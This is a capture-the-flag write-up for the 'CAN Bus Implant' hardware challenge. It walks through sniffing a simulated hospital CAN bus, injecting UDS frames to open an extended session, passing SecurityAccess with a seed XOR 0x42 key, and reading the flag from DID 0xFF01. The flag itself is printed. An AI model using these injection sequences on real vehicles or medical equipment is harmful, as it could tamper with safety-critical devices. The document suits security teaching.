ESPILON-CTF-2026-Writeups/Hardware/CAN_Bus_Implant/README.md

# CAN Bus Implant

| Field | Value |
|-------|-------|
| Category | Hardware |
| Difficulty | Medium-Hard |
| Points | 400 |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

The CAN bus of Clinique Sainte-Mika connects medical equipment.
A sniffing tap and injection point give you access to the raw bus traffic.

Analyze the frames, identify the UDS diagnostic protocol in use, and perform
a security access sequence to extract classified data.

- Sniff (read-only): `tcp/<host>:3600`
- Inject (write): `tcp/<host>:3601`

Format: **ESPILON{...}**

---

## TL;DR

Sniff the CAN bus, identify the UDS diagnostic protocol from request/response patterns,
enter an extended diagnostic session, perform a SecurityAccess seed/key exchange (XOR key
derivation), then read DID 0xFF01 to get the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| `nc` | Connect to sniff and inject ports |
| Python 3 | Automated scripting |
| Knowledge of UDS (ISO 14229) | Understand the protocol services |

---

## Solution

### Step 1 — Connect to both ports

Open two terminals simultaneously:

```bash
# Terminal 1: Sniff
nc <host> 3600

# Terminal 2: Inject
nc <host> 3601
```

![two terminal windows showing sniff output and inject prompt](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_terminals.png)

### Step 2 — Observe the traffic

Watch the sniff port. The following patterns emerge:

| CAN ID | Type | Description |
|--------|------|-------------|
| `0x100` | Heartbeat | Periodic counter |
| `0x200`–`0x203` | Sensor data | Temperature, heart rate |
| `0x7DF` | Broadcast | OBD diagnostic request |
| `0x7E0` → `0x7E8` | UDS pair | Request/response (periodic VIN reads) |

The `0x7E0`/`0x7E8` pair is the UDS diagnostic channel.

![sniff output showing the 0x7E0/0x7E8 request/response pattern](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_sniff.png)

### Step 3 — Enter extended diagnostic session

Inject a DiagnosticSessionControl (service 0x10, session 0x03 = extended):

```text
send 7E0 02 10 03 00 00 00 00 00
```

The sniff port shows the positive response on `0x7E8`: `50 03`.

### Step 4 — Request a security seed

Send SecurityAccess (service 0x27, subfunction 0x01 = request seed):

```text
send 7E0 02 27 01 00 00 00 00 00
```

The response contains a 4-byte seed: `67 01 XX XX XX XX`

![seed bytes visible in the 0x7E8 response](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_seed.png)

### Step 5 — Compute the key and authenticate

The key derivation is XOR of each seed byte with `0x42`:

```python
seed = [0xXX, 0xXX, 0xXX, 0xXX]  # from the 0x7E8 response
key  = [b ^ 0x42 for b in seed]
```

Send SecurityAccess (subfunction 0x02 = send key):

```text
send 7E0 06 27 02 KK KK KK KK 00
```

Positive response: `67 02`

### Step 6 — Read the flag from DID 0xFF01

Send ReadDataByIdentifier (service 0x22, DID 0xFF01):

```text
send 7E0 03 22 FF 01 00 00 00 00
```

The response on `0x7E8` contains the flag.

![0x7E8 response containing the flag bytes after successful security access](https://git.espilon.net/Eun0us/ESPILON-CTF-2026-Writeups/raw/branch/main/screens/can_flag.png)

### Key concepts

- **CAN bus**: Controller Area Network — no authentication, broadcast medium, widely used
  in vehicles and medical equipment
- **UDS (ISO 14229)**: Diagnostic protocol with services including `DiagnosticSessionControl`
  (0x10), `SecurityAccess` (0x27), `ReadDataByIdentifier` (0x22)
- **SecurityAccess**: Challenge-response authentication — ECU sends seed, tester must compute
  the correct key. Here the key is trivially `seed XOR 0x42`.
- **Traffic analysis**: Identifying request/response patterns from raw CAN bus traffic is the
  first step in any CAN bus penetration test

---

## Flag

`ESPILON{c4n_bus_1mpl4nt_4ct1v3}`